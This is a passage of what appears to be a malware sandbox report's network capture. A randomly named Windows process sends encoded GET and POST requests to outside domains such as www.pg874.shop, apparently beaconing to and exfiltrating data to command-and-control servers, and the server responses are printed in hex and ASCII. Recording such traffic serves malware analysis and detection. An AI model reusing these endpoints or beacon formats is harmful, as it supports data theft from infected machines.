                                                                                                                            Data Raw: 6d 52 75 3d 59 61 6c 54 53 47 57 50 4f 35 39 7a 33 37 31 57 51 75 6c 6a 75 4d 78 79 70 34 42 44 33 79 50 4b 48 42 2f 4c 47 4e 64 54 6d 4a 43 69 4a 61 55 54 65 41 54 6a 53 33 42 5a 77 71 72 39 71 37 77 68 52 63 32 35 70 6e 57 42 32 4b 36 4e 71 4a 4b 47 41 31 6d 71 4d 71 41 31 32 31 62 4a 30 6a 54 59 4a 57 38 55 45 72 38 73 73 73 51 39 64 4d 51 61 56 6a 73 6a 56 49 36 6c 5a 4d 6e 74 39 61 54 4b 72 66 66 39 55 6c 4b 68 46 66 6e 4c 4f 39 4e 6c 62 65 73 64 7a 61 50 39 33 56 34 49 79 4a 76 66 61 76 61 55 31 74 33 34 37 7a 4f 4e 52 51 4c 2f 69 47 79 73 73 6a 5a 78 5a 44 62 47 61 63 72 2b 62 69 70 69 46 47 39 6f 67 73 66 6d 41 30 6d 50 75 2b 38 37 67 35 42 6f 78 53 6f 53 63 4c 38 72 48 45 75 63 5a 59 5a 62 38 74 4f 45 62 32 34 46 42 58 4f 4a 6a 39 53 36 72 58 45 59 62 4e 6e 66 37 38 34 33 6c 6f 79 61 7a 52 62 72 31 6c 68 32 77 6b 32 37 44 44 62 6c 51 39 39 2b 5a 66 54 49 48 70 37 70 72 47 7a 31 6b 6b 54 70 69 6c 6a 41 5a 52 6b 79 44 37 6b 63 67 46 51 57 79 64 73 48 48 59 59 72 32 42 33 65 43 6a 52 2b 4e 69 [TRUNCATED]
                                                                                                                            Data Ascii: mRu=YalTSGWPO59z371WQuljuMxyp4BD3yPKHB/LGNdTmJCiJaUTeATjS3BZwqr9q7whRc25pnWB2K6NqJKGA1mqMqA121bJ0jTYJW8UEr8sssQ9dMQaVjsjVI6lZMnt9aTKrff9UlKhFfnLO9NlbesdzaP93V4IyJvfavaU1t347zONRQL/iGyssjZxZDbGacr+bipiFG9ogsfmA0mPu+87g5BoxSoScL8rHEucZYZb8tOEb24FBXOJj9S6rXEYbNnf7843loyazRbr1lh2wk27DDblQ99+ZfTIHp7prGz1kkTpiljAZRkyD7kcgFQWydsHHYYr2B3eCjR+Ni83FdbmV4mYy+pBNxpNuPg7x+4IA7rKyZH+4muRaJgjBsJI4Iv+fHIrYx6wCutM//4bZXsos78r0N45Ihb0Sqt96mJBOqysK91ZiSoe8QGsVRM4BqgoUaRp5u27ogxgsUMbxf3NpbE6jQduZ+8UmMYG24iCC+hOpQ5yyX+mo3KGZprC8Ah468ELUryB1Jks4diQrtWBCaGL+pzVSzpOql1DVChXDhWsEX3RALyEFZFT+tzB0aH0n/ImLDSGGcMF2piu0LxV58M58xeaZxxCbKi1bPWmLRA6qLE21CySuhh5QPU49Gy9aZgtglGjY1r8+ozmzQFHgquV+wEPmh+HVhgOXWdBsrMx7/G/yxnwX1U+rZ6UpFtk7RV1x+4fLYj/0DvpXyq0v2fyXKcSQAl3jo361WfpV3s8FECryjUt8Ww2q+gR+KvqQooS71KFExVB9VY8vHoTf+XrjkUUP0uI9CbabRjqTF6100YnA7MnwAPQwwYGPNJ+7dKyXik5f5UYu+WMN9u86KzfO51gIjOpa9mEHDw553cQN1bnSH/YCLneVLQVxmLyY2Szps4bQelxUaMxg38QwhRuWXnDztSKCMhh8hvR2lO8mnWil+dF1QsAQvfCGSrbtvIHFkX9Pcyba7rQ9XvXMgFqZvaR9gcB2fOjODyFMtZZYAUm [TRUNCATED]
                                                                                                                            Nov 12, 2024 15:30:27.179158926 CET535INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Nov 2024 14:30:27 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Content-Length: 337
                                                                                                                            Connection: close
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00
                                                                                                                            Data Ascii: 1o0w~oKU!TQ:!*'UP@D2ll2'%*!$mj$+8e*^ *fm6Rvl)J@N_W%Jrx|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x|$


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            8192.168.11.2049727154.38.64.6802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:30:29.708959103 CET473OUTGET /6yjb/?mRu=VYNzRxyQK7JD7ZohbYVagv51ruE2l0awbhfoJPQ4rqLtN/pKU1ruR3BE6r+8vb9gac3NpWXxvYS6rs+3SUr3GMlMxkDr3AnCXH8/Zbk4o49navQqKFljaLg=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.qiusuo.vip
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:30:30.042308092 CET820INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Nov 2024 14:30:29 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Content-Length: 654
                                                                                                                            Connection: close
                                                                                                                            X-Cache: MISS
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 6c 68 2e 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 30 6f 30 6f 30 6f 30 6f 30 2e 63 6f 6d 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 6c 68 2e 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 30 6f 30 6f 30 6f 30 6f 30 2e 63 6f 6d 2f 71 75 64 61 6f 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 21 2d 2d 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 6c 68 2e 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 30 6f 30 6f 30 6f 30 6f 30 2e 63 6f 6d 2f 70 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head> <script src="//lh.0o0o0o0o0o0o0o00o0o0o0o0.com/jquery.js"></script> <script charset="UTF-8" id="LA_COLLECT" src="//lh.0o0o0o0o0o0o0o00o0o0o0o0.com/qudao1.js"></script> ...script type="text/javascript" src="//lh.0o0o0o0o0o0o0o00o0o0o0o0.com/pd.js"></script--> <meta charset="UTF-8"> <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"> <title>website</title> <style> html,body,iframe{width: 100%;height: 100%;padding: 0;margin: 0} #wrap{width: 100%;height: 100%;} iframe{border: none;} </style></head>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            9192.168.11.204972884.32.84.32802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:30:35.481281042 CET741OUTPOST /h7d8/ HTTP/1.1
                                                                                                                            Host: www.pg874.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.pg874.shop
                                                                                                                            Referer: http://www.pg874.shop/h7d8/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 33 38 39 69 6e 4a 52 75 66 67 34 69 59 69 34 6f 57 61 2b 77 35 6c 43 61 2b 63 36 31 70 74 56 55 70 50 77 76 6b 49 65 39 6c 61 41 6e 6e 56 73 4e 6e 44 6e 6e 4c 74 7a 6a 66 6b 6f 78 78 55 46 52 54 42 32 36 47 67 4a 76 51 72 52 2b 66 70 2b 39 31 33 4c 39 39 6d 35 2f 4a 2f 55 70 6f 43 67 30 73 6a 58 4f 54 58 41 63 61 48 35 59 31 73 56 75 61 74 47 74 70 34 6a 58 39 78 5a 66 56 4d 63 35 66 43 68 50 34 62 32 75 66 30 34 58 74 49 44 30 54 69 53 61 6c 45 31 76 4d 4b 53 42 63 37 30 56 35 63 57 4b 41 79 41 41 51 4c 36 38 7a 4b 4f 6e 41 45 34 2b 59 74 68 6b 78 66 70 74 78 4b 30 5a 2f 77 3d 3d
                                                                                                                            Data Ascii: mRu=389inJRufg4iYi4oWa+w5lCa+c61ptVUpPwvkIe9laAnnVsNnDnnLtzjfkoxxUFRTB26GgJvQrR+fp+913L99m5/J/UpoCg0sjXOTXAcaH5Y1sVuatGtp4jX9xZfVMc5fChP4b2uf04XtID0TiSalE1vMKSBc70V5cWKAyAAQL68zKOnAE4+YthkxfptxK0Z/w==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            10192.168.11.204972984.32.84.32802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:30:38.254262924 CET761OUTPOST /h7d8/ HTTP/1.1
                                                                                                                            Host: www.pg874.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.pg874.shop
                                                                                                                            Referer: http://www.pg874.shop/h7d8/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 33 38 39 69 6e 4a 52 75 66 67 34 69 59 43 49 6f 55 35 57 77 31 56 43 56 78 38 36 31 2f 64 56 51 70 50 4d 76 6b 4e 2b 74 6d 6f 6b 6e 6d 31 38 4e 6d 42 50 6e 49 74 7a 6a 51 30 6f 30 73 6b 45 64 54 42 71 59 47 6c 78 76 51 6f 74 2b 66 6f 4f 39 30 41 6e 69 38 32 35 39 63 76 55 76 32 79 67 30 73 6a 58 4f 54 55 38 6d 61 44 56 59 31 2f 39 75 5a 4d 47 75 67 59 6a 59 36 78 5a 66 45 63 63 39 66 43 68 68 34 65 75 41 66 32 41 58 74 4e 48 30 54 7a 53 5a 76 45 31 31 49 4b 54 6f 64 4b 5a 66 67 34 71 45 4e 52 6f 54 57 2b 71 6f 32 63 44 39 64 32 4d 61 62 2b 39 57 31 76 51 46 7a 49 31 43 69 7a 54 36 36 49 49 78 49 49 67 53 2f 66 63 65 73 57 6d 66 69 79 34 3d
                                                                                                                            Data Ascii: mRu=389inJRufg4iYCIoU5Ww1VCVx861/dVQpPMvkN+tmoknm18NmBPnItzjQ0o0skEdTBqYGlxvQot+foO90Ani8259cvUv2yg0sjXOTU8maDVY1/9uZMGugYjY6xZfEcc9fChh4euAf2AXtNH0TzSZvE11IKTodKZfg4qENRoTW+qo2cD9d2Mab+9W1vQFzI1CizT66IIxIIgS/fcesWmfiy4=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            11192.168.11.204973084.32.84.32802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:30:41.021265030 CET2578OUTPOST /h7d8/ HTTP/1.1
                                                                                                                            Host: www.pg874.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.pg874.shop
                                                                                                                            Referer: http://www.pg874.shop/h7d8/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 33 38 39 69 6e 4a 52 75 66 67 34 69 59 43 49 6f 55 35 57 77 31 56 43 56 78 38 36 31 2f 64 56 51 70 50 4d 76 6b 4e 2b 74 6d 6f 73 6e 6d 48 45 4e 6e 67 50 6e 4a 74 7a 6a 54 30 6f 31 73 6b 45 55 54 42 69 63 47 6c 31 5a 51 74 68 2b 5a 2b 61 39 7a 31 54 69 79 32 35 39 65 76 55 71 6f 43 68 32 73 6e 4c 30 54 55 73 6d 61 44 56 59 31 36 35 75 4f 4e 47 75 69 59 6a 58 39 78 5a 74 56 4d 63 46 66 47 31 58 34 66 2b 2b 65 46 49 58 74 74 33 30 51 42 4b 5a 6a 45 31 72 4e 4b 54 77 64 4b 56 63 67 34 66 39 4e 51 63 35 57 35 32 6f 30 61 69 44 47 48 70 4d 5a 74 5a 6a 77 2f 45 49 7a 4c 74 74 39 44 37 65 2b 35 34 2b 4d 73 4a 43 34 4e 59 4c 7a 58 6a 41 34 56 55 50 66 55 33 6b 6d 4a 39 7a 66 2b 4a 30 36 66 39 64 32 56 66 39 47 4c 79 7a 57 36 51 66 46 46 77 64 43 63 46 72 79 53 65 4b 6f 63 69 74 45 59 69 46 55 49 72 62 73 47 43 39 68 56 52 59 56 55 36 4f 39 54 6b 64 65 6d 73 49 73 4f 6c 4b 2b 4a 6e 50 6c 62 46 31 74 71 41 2b 4f 71 4b 38 5a 38 52 69 38 4b 71 6a 53 53 2f 66 50 33 35 32 7a 36 6f 68 54 42 31 47 68 4c [TRUNCATED]
                                                                                                                            Data Ascii: mRu=389inJRufg4iYCIoU5Ww1VCVx861/dVQpPMvkN+tmosnmHENngPnJtzjT0o1skEUTBicGl1ZQth+Z+a9z1Tiy259evUqoCh2snL0TUsmaDVY165uONGuiYjX9xZtVMcFfG1X4f++eFIXtt30QBKZjE1rNKTwdKVcg4f9NQc5W52o0aiDGHpMZtZjw/EIzLtt9D7e+54+MsJC4NYLzXjA4VUPfU3kmJ9zf+J06f9d2Vf9GLyzW6QfFFwdCcFrySeKocitEYiFUIrbsGC9hVRYVU6O9TkdemsIsOlK+JnPlbF1tqA+OqK8Z8Ri8KqjSS/fP352z6ohTB1GhLNariG0KPE6Rm4rPH1s7060XfoXFFYStQLSIeAf8e0iq+kGo90U9ZSAOV9npDQDf/LwJGGujPNu53z4gkOWTURWGo5FBG0j6ug//AyvPoxPa40pSCTxh/Rlot7pshi9TJ7Vj44I7RhlGvbYnXvHWYPbULiSEPw5VbAkuiXdI/lw6rTsIGekKfPKZAHi9yRLjhSHTimVZV6Apki2R21hjoVdUveNAXRVFPtPVp57ilUasOOW0eP/eKdzvB6w+dh664T7jg/abJpTTg5Uzxr08vfVwXPREBzfWATAhtcYWUaWOBlshjMyikdQ2XWJQnR06aFGycjBu32lRuqAaaKKvUZRsmnva3jarqkvA1yFzTJdP9aV9RclWnKrCZuDTqFZOnUBzQS+PnwSk4wpQdLMyCgaQJDyPKbUs/mny78AhF4GxdRwbRFuZR0w7v0b/8jwcOGoNEWhD/hzJEQN8tKZ55zPvcYGnUCAemCzj6suFg7CUkpMZY6BKmP/PVeZomzIjfepJAX9xFQ2VqTYi/PZYaDGQQaM+uo9bdeAz01NOv1X4JwJUqoPP6XWzF1G/AUNEOfvrh+i9ouQ/kOm7AnJ8e+orOZO4oR/cY1aDSQEWlYWaTP7vNsV2VUOS5XGMC3zaYQlQdg0VDiTtbJ6U98dQaFd9XiYDY18j+d3 [TRUNCATED]
                                                                                                                            Nov 12, 2024 15:30:41.021328926 CET5332OUTData Raw: 4c 4d 2f 36 6e 4c 63 76 2f 32 55 4b 2f 43 7a 46 51 4e 43 6c 64 2b 68 49 6c 77 62 53 47 54 4c 4a 71 76 41 64 42 30 6f 46 6d 2f 37 34 4f 73 36 42 64 4c 51 73 76 5a 6b 68 44 31 74 58 2b 65 41 31 64 53 52 5a 53 36 65 4d 72 5a 55 34 2f 30 6e 68 66 79
                                                                                                                            Data Ascii: LM/6nLcv/2UK/CzFQNCld+hIlwbSGTLJqvAdB0oFm/74Os6BdLQsvZkhD1tX+eA1dSRZS6eMrZU4/0nhfyOfjtxIepzDcpSsXuj6VAyan23f9ieKNcYONgL8oCy5RIQRroWQB7x7A78cHpUT66FtxZ4UMi6LZ/INMFrj9M1f8mKBTkyalR603nbDgDJk9cMVf+VfVzGee3+v9BzqhfE7ywPBvsd+joEkn4P2/Xth9sd4QaOZTUy


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            12192.168.11.204973184.32.84.32802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:30:43.801985025 CET473OUTGET /h7d8/?mRu=6+VCk9pNPTQZYCZ6d4PN3EmbuLb87q5olpsVnOemsYlmrkAHkUX/D7H9eR5xtWpIZUSGBjAAXrZ9ZbWt4k2m/mELc90NwjhxnhDwTkUjNTY6s8tAYo2upp8=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.pg874.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:30:44.047947884 CET1289INHTTP/1.1 200 OK
                                                                                                                            Server: hcdn
                                                                                                                            Date: Tue, 12 Nov 2024 14:30:43 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 9973
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            x-hcdn-request-id: 1f3a210fb09ae77cb59ba56a858625ab-asc-edge4
                                                                                                                            Expires: Tue, 12 Nov 2024 14:30:42 GMT
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;m
                                                                                                                            Nov 12, 2024 15:30:44.047967911 CET1289INData Raw: 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66 38
                                                                                                                            Data Ascii: argin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:60
                                                                                                                            Nov 12, 2024 15:30:44.047979116 CET1289INData Raw: 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f
                                                                                                                            Data Ascii: ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;lin
                                                                                                                            Nov 12, 2024 15:30:44.047987938 CET1289INData Raw: 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74
                                                                                                                            Data Ascii: ze:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:
                                                                                                                            Nov 12, 2024 15:30:44.048012018 CET1289INData Raw: 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f
                                                                                                                            Data Ascii: -graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidde
                                                                                                                            Nov 12, 2024 15:30:44.048016071 CET1289INData Raw: 46 69 6e 64 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d
                                                                                                                            Data Ascii: Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hosting</div><br><p>Add your website to any of your hosting plans. Follow the article
                                                                                                                            Nov 12, 2024 15:30:44.048028946 CET1289INData Raw: 54 46 2d 31 36 20 76 61 6c 75 65 22 29 3b 36 35 35 33 35 3c 72 26 26 28 72 2d 3d 36 35 35 33 36 2c 65 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 72 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 29 2c 72 3d
                                                                                                                            Data Ascii: TF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75*(o<26)-((0!=r)<<5)}function n(r,e,n){var t;
                                                                                                                            Nov 12, 2024 15:30:44.048063993 CET1289INData Raw: 68 61 72 43 6f 64 65 41 74 28 30 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 75 74 66 31 36 2e 65 6e 63 6f 64 65 28 6d 29 7d 2c 74 68 69 73 2e 65 6e 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 61 29 7b 76 61 72 20 68 2c 66 2c 69 2c 63 2c 75
                                                                                                                            Data Ascii: harCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLowerCase())).length;if(a)for(d=0;d<v;d++)w[d]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f


